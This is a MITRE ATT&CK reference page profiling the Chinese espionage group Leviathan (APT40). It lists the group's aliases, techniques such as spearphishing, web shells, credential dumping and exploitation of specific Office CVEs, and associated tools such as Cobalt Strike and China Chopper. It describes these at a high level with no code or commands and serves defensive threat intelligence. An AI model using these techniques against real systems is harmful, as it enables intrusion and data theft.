Currently viewing ATT&CK v14.1 which was live between October 31, 2023 and April 22, 2024. Learn more about the versioning system or see the live site.
Thank you to Tidal Cyber and SOC Prime for becoming ATT&CK's first Benefactors. To join the cohort, or learn more about this program visit our Benefactors page.
  1. Home
  2. Groups
  3. Leviathan

Leviathan

Leviathan is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.[1] Active since at least 2009, Leviathan has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.[1][2][3]

ID: G0065
Associated Groups: MUDCARP, Kryptonite Panda, Gadolinium, BRONZE MOHAWK, TEMP.Jumper, APT40, TEMP.Periscope
Contributors: Valerii Marchuk, Cybersecurity Help s.r.o.
Version: 3.0
Created: 18 April 2018
Last Modified: 15 April 2022

Associated Group Descriptions

Name Description
MUDCARP

[1][4]
Kryptonite Panda

[1][5]
Gadolinium

[1][6]
BRONZE MOHAWK

[1][7]
TEMP.Jumper

Leviathan was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.[1][8]
APT40

FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.[1][2][3][8]
TEMP.Periscope

Leviathan was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.[1][3][8]
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1583 .001 Acquire Infrastructure: Domains

Leviathan has established domains that impersonate legitimate entities to use for targeting efforts. [1][4]
Enterprise T1560 Archive Collected Data

Leviathan has archived victim's data prior to exfiltration.[1]
Enterprise T1197 BITS Jobs

Leviathan has used BITSAdmin to download additional tools.[3]
Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.[2][3]
.009 Boot or Logon Autostart Execution: Shortcut Modification

Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.[2][3]
Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Leviathan has used PowerShell for execution.[2][3][1][4]
.005 Command and Scripting Interpreter: Visual Basic

Leviathan has used VBScript.[2]
Enterprise T1586 .001 Compromise Accounts: Social Media Accounts

Leviathan has compromised social media accounts to conduct social engineering attacks.[1]
.002 Compromise Accounts: Email Accounts

Leviathan has compromised email accounts to conduct social engineering attacks.[1]
Enterprise T1074 .001 Data Staged: Local Data Staging

Leviathan has used C:\Windows\Debug and C:\Perflogs as staging directories.[3][1]
.002 Data Staged: Remote Data Staging

Leviathan has staged data remotely prior to exfiltration.[1]
Enterprise T1140 Deobfuscate/Decode Files or Information

Leviathan has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors.[2]
Enterprise T1189 Drive-by Compromise

Leviathan has infected victims using watering holes.[1]
Enterprise T1585 .001 Establish Accounts: Social Media Accounts

Leviathan has created new social media accounts for targeting efforts.[1]
.002 Establish Accounts: Email Accounts

Leviathan has created new email accounts for targeting efforts.[1]
Enterprise T1546 .003 Event Triggered Execution: Windows Management Instrumentation Event Subscription

Leviathan has used WMI for persistence.[3]
Enterprise T1041 Exfiltration Over C2 Channel

Leviathan has exfiltrated data over its C2 channel.[1]
Enterprise T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.[2][3]
Enterprise T1203 Exploitation for Client Execution

Leviathan has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.[2][3][1][4]
Enterprise T1133 External Remote Services

Leviathan has used external remote services such as virtual private networks (VPN) to gain initial access.[1]
Enterprise T1589 .001 Gather Victim Identity Information: Credentials

Leviathan has collected compromised credentials to use for targeting efforts.[1]
Enterprise T1105 Ingress Tool Transfer

Leviathan has downloaded additional scripts and files from adversary-controlled servers.[2][3]
Enterprise T1559 .002 Inter-Process Communication: Dynamic Data Exchange

Leviathan has utilized OLE as a method to insert malicious content inside various phishing documents. [4]
Enterprise T1534 Internal Spearphishing

Leviathan has conducted internal spearphishing within the victim's environment for lateral movement.[1]
Enterprise T1027 Obfuscated Files or Information

Leviathan has obfuscated code using base64 and gzip compression.[2]
.001 Binary Padding

Leviathan has inserted garbage characters into code, presumably to avoid anti-virus detection.[2]
.003 Steganography

Leviathan has used steganography to hide stolen data inside other files stored on Github.[1]
Enterprise T1003 OS Credential Dumping

Leviathan has used publicly available tools to dump password hashes, including HOMEFRY.[8]
.001 LSASS Memory

Leviathan has used publicly available tools to dump password hashes, including ProcDump and WCE.[8]
Enterprise T1566 .001 Phishing: Spearphishing Attachment

Leviathan has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.[2][1]
.002 Phishing: Spearphishing Link

Leviathan has sent spearphishing emails with links, often using a fraudulent lookalike domain and stolen branding.[2][1]
Enterprise T1055 .001 Process Injection: Dynamic-link Library Injection

Leviathan has utilized techniques like reflective DLL loading to write a DLL into memory and load a shell that provides backdoor access to the victim.[4]
Enterprise T1572 Protocol Tunneling

Leviathan has used protocol tunneling to further conceal C2 communications and infrastructure.[1]
Enterprise T1090 .003 Proxy: Multi-hop Proxy

Leviathan has used multi-hop proxies to disguise the source of their malicious traffic.[1]
Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

Leviathan has targeted RDP credentials and used it to move through the victim environment.[8]

.004 Remote Services: SSH

Leviathan used ssh for internal reconnaissance.[8]
Enterprise T1505 .003 Server Software Component: Web Shell

Leviathan relies on web shells for an initial foothold as well as persistence into the victim's systems.[8][1]
Enterprise T1553 .002 Subvert Trust Controls: Code Signing

Leviathan has used stolen code signing certificates to sign malware.[3][8]
Enterprise T1218 .010 System Binary Proxy Execution: Regsvr32

Leviathan has used regsvr32 for execution.[2]
Enterprise T1204 .001 User Execution: Malicious Link

Leviathan has sent spearphishing email links attempting to get a user to click.[2][1]
.002 User Execution: Malicious File

Leviathan has sent spearphishing attachments attempting to get a user to click.[2][1]
Enterprise T1078 Valid Accounts

Leviathan has obtained valid accounts to gain initial access.[1][4]
Enterprise T1102 .003 Web Service: One-Way Communication

Leviathan has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet.[3]
Enterprise T1047 Windows Management Instrumentation

Leviathan has used WMI for execution.[2]

Software

ID Name References Techniques
S0110 at [8] Scheduled Task/Job: At
S0642 BADFLICK [3][4] Archive Collected Data: Archive via Library, Data from Local System, Deobfuscate/Decode Files or Information, File and Directory Discovery, Ingress Tool Transfer, Phishing: Spearphishing Attachment, System Information Discovery, System Network Configuration Discovery, User Execution: Malicious File, Virtualization/Sandbox Evasion: Time Based Evasion
S0190 BITSAdmin [3] BITS Jobs, Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Ingress Tool Transfer, Lateral Tool Transfer
S0069 BLACKCOFFEE [3] Command and Scripting Interpreter: Windows Command Shell, File and Directory Discovery, Indicator Removal: File Deletion, Multi-Stage Channels, Process Discovery, Web Service: Dead Drop Resolver, Web Service: Bidirectional Communication
S0020 China Chopper [3][1][4] Application Layer Protocol: Web Protocols, Brute Force: Password Guessing, Command and Scripting Interpreter: Windows Command Shell, Data from Local System, File and Directory Discovery, Indicator Removal: Timestomp, Ingress Tool Transfer, Network Service Discovery, Obfuscated Files or Information: Software Packing, Server Software Component: Web Shell
S0154 Cobalt Strike [2][3][1] Abuse Elevation Control Mechanism: Sudo and Sudo Caching, Abuse Elevation Control Mechanism: Bypass User Account Control, Access Token Manipulation: Parent PID Spoofing, Access Token Manipulation: Token Impersonation/Theft, Access Token Manipulation: Make and Impersonate Token, Account Discovery: Domain Account, Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, Application Layer Protocol: File Transfer Protocols, BITS Jobs, Browser Session Hijacking, Command and Scripting Interpreter: JavaScript, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Python, Command and Scripting Interpreter: Windows Command Shell, Create or Modify System Process: Windows Service, Data Encoding: Standard Encoding, Data from Local System, Data Obfuscation: Protocol Impersonation, Data Transfer Size Limits, Deobfuscate/Decode Files or Information, Encrypted Channel: Asymmetric Cryptography, Encrypted Channel: Symmetric Cryptography, Exploitation for Client Execution, Exploitation for Privilege Escalation, File and Directory Discovery, Hide Artifacts: Process Argument Spoofing, Impair Defenses: Disable or Modify Tools, Indicator Removal: Timestomp, Ingress Tool Transfer, Input Capture: Keylogging, Modify Registry, Native API, Network Service Discovery, Network Share Discovery, Non-Application Layer Protocol, Obfuscated Files or Information: Indicator Removal from Tools, Obfuscated Files or Information, Office Application Startup: Office Template Macros, OS Credential Dumping: LSASS Memory, OS Credential Dumping: Security Account Manager, Permission Groups Discovery: Domain Groups, Permission Groups Discovery: Local Groups, Process Discovery, Process Injection: Dynamic-link Library Injection, Process Injection: Process Hollowing, Process Injection, Protocol Tunneling, Proxy: Domain Fronting, Proxy: Internal Proxy, Query Registry, Reflective Code Loading, Remote Services: Remote Desktop Protocol, Remote Services: SSH, Remote Services: Windows Remote Management, Remote Services: SMB/Windows Admin Shares, Remote Services: Distributed Component Object Model, Remote System Discovery, Scheduled Transfer, Screen Capture, Software Discovery, Subvert Trust Controls: Code Signing, System Binary Proxy Execution: Rundll32, System Network Configuration Discovery, System Network Connections Discovery, System Service Discovery, System Services: Service Execution, Use Alternate Authentication Material: Pass the Hash, Valid Accounts: Domain Accounts, Valid Accounts: Local Accounts, Windows Management Instrumentation
S0021 Derusbi [3][1] Audio Capture, Command and Scripting Interpreter: Unix Shell, Encrypted Channel: Symmetric Cryptography, Fallback Channels, File and Directory Discovery, Indicator Removal: Timestomp, Indicator Removal: File Deletion, Input Capture: Keylogging, Non-Application Layer Protocol, Non-Standard Port, Process Discovery, Process Injection: Dynamic-link Library Injection, Query Registry, Screen Capture, System Binary Proxy Execution: Regsvr32, System Information Discovery, System Owner/User Discovery, Video Capture
S0363 Empire [1] Abuse Elevation Control Mechanism: Bypass User Account Control, Access Token Manipulation: SID-History Injection, Access Token Manipulation, Access Token Manipulation: Create Process with Token, Account Discovery: Domain Account, Account Discovery: Local Account, Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Application Layer Protocol: Web Protocols, Archive Collected Data, Automated Collection, Automated Exfiltration, Boot or Logon Autostart Execution: Security Support Provider, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Boot or Logon Autostart Execution: Shortcut Modification, Browser Information Discovery, Clipboard Data, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter, Create Account: Local Account, Create Account: Domain Account, Create or Modify System Process: Windows Service, Credentials from Password Stores: Credentials from Web Browsers, Domain Policy Modification: Group Policy Modification, Domain Trust Discovery, Email Collection: Local Email Collection, Encrypted Channel: Asymmetric Cryptography, Event Triggered Execution: Accessibility Features, Exfiltration Over C2 Channel, Exfiltration Over Web Service: Exfiltration to Code Repository, Exfiltration Over Web Service: Exfiltration to Cloud Storage, Exploitation for Privilege Escalation, Exploitation of Remote Services, File and Directory Discovery, Group Policy Discovery, Hijack Execution Flow: Path Interception by Unquoted Path, Hijack Execution Flow: Path Interception by Search Order Hijacking, Hijack Execution Flow: Path Interception by PATH Environment Variable, Hijack Execution Flow: Dylib Hijacking, Hijack Execution Flow: DLL Search Order Hijacking, Indicator Removal: Timestomp, Ingress Tool Transfer, Input Capture: Keylogging, Input Capture: Credential API Hooking, Native API, Network Service Discovery, Network Share Discovery, Network Sniffing, Obfuscated Files or Information: Command Obfuscation, OS Credential Dumping: LSASS Memory, Process Discovery, Process Injection, Remote Services: Distributed Component Object Model, Remote Services: SSH, Scheduled Task/Job: Scheduled Task, Screen Capture, Software Discovery: Security Software Discovery, Steal or Forge Kerberos Tickets: Kerberoasting, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, System Owner/User Discovery, System Services: Service Execution, Trusted Developer Utilities Proxy Execution: MSBuild, Unsecured Credentials: Credentials In Files, Unsecured Credentials: Private Keys, Use Alternate Authentication Material: Pass the Hash, Video Capture, Web Service: Bidirectional Communication, Windows Management Instrumentation
S0032 gh0st RAT [1] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter, Create or Modify System Process: Windows Service, Data Encoding: Standard Encoding, Deobfuscate/Decode Files or Information, Dynamic Resolution: Fast Flux DNS, Encrypted Channel: Symmetric Cryptography, Encrypted Channel, Hijack Execution Flow: DLL Side-Loading, Indicator Removal: Clear Windows Event Logs, Indicator Removal: File Deletion, Ingress Tool Transfer, Input Capture: Keylogging, Modify Registry, Native API, Non-Application Layer Protocol, Process Discovery, Process Injection, Query Registry, Screen Capture, Shared Modules, System Binary Proxy Execution: Rundll32, System Information Discovery, System Services: Service Execution
S0232 HOMEFRY [3] Command and Scripting Interpreter: Windows Command Shell, Obfuscated Files or Information, OS Credential Dumping
S0233 MURKYTOP [3][1] Account Discovery: Local Account, Command and Scripting Interpreter: Windows Command Shell, Indicator Removal: File Deletion, Network Service Discovery, Network Share Discovery, Permission Groups Discovery, Remote System Discovery, Scheduled Task/Job: At, System Information Discovery
S0228 NanHaiShu [2][1] Application Layer Protocol: DNS, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: JavaScript, Command and Scripting Interpreter: Visual Basic, Impair Defenses: Disable or Modify Tools, Indicator Removal: File Deletion, Ingress Tool Transfer, Obfuscated Files or Information, System Binary Proxy Execution: Mshta, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery
S0039 Net [8] Account Discovery: Domain Account, Account Discovery: Local Account, Create Account: Local Account, Create Account: Domain Account, Indicator Removal: Network Share Connection Removal, Network Share Discovery, Password Policy Discovery, Permission Groups Discovery: Domain Groups, Permission Groups Discovery: Local Groups, Remote Services: SMB/Windows Admin Shares, Remote System Discovery, System Network Connections Discovery, System Service Discovery, System Services: Service Execution, System Time Discovery
S0229 Orz [2][1][4] Command and Scripting Interpreter: Windows Command Shell, File and Directory Discovery, Indicator Removal, Ingress Tool Transfer, Modify Registry, Obfuscated Files or Information, Process Discovery, Process Injection: Process Hollowing, Software Discovery, System Binary Proxy Execution: Regsvr32, System Information Discovery, System Network Configuration Discovery, Web Service: Bidirectional Communication
S0194 PowerSploit [1] Access Token Manipulation, Account Discovery: Local Account, Audio Capture, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Boot or Logon Autostart Execution: Security Support Provider, Command and Scripting Interpreter: PowerShell, Create or Modify System Process: Windows Service, Credentials from Password Stores: Windows Credential Manager, Data from Local System, Domain Trust Discovery, Hijack Execution Flow: Path Interception by PATH Environment Variable, Hijack Execution Flow: Path Interception by Unquoted Path, Hijack Execution Flow: DLL Search Order Hijacking, Hijack Execution Flow: Path Interception by Search Order Hijacking, Input Capture: Keylogging, Obfuscated Files or Information: Indicator Removal from Tools, Obfuscated Files or Information: Command Obfuscation, OS Credential Dumping: LSASS Memory, Process Discovery, Process Injection: Dynamic-link Library Injection, Query Registry, Reflective Code Loading, Scheduled Task/Job: Scheduled Task, Screen Capture, Steal or Forge Kerberos Tickets: Kerberoasting, Unsecured Credentials: Credentials in Registry, Unsecured Credentials: Group Policy Preferences, Windows Management Instrumentation
S0183 Tor [1] Encrypted Channel: Asymmetric Cryptography, Proxy: Multi-hop Proxy
S0005 Windows Credential Editor [8] OS Credential Dumping: LSASS Memory

References

  1. CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department. Retrieved August 12, 2021.
  2. Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
  3. FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
  4. Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021.
  1. Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021.
  2. Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021.
  3. SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021.
  4. Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019.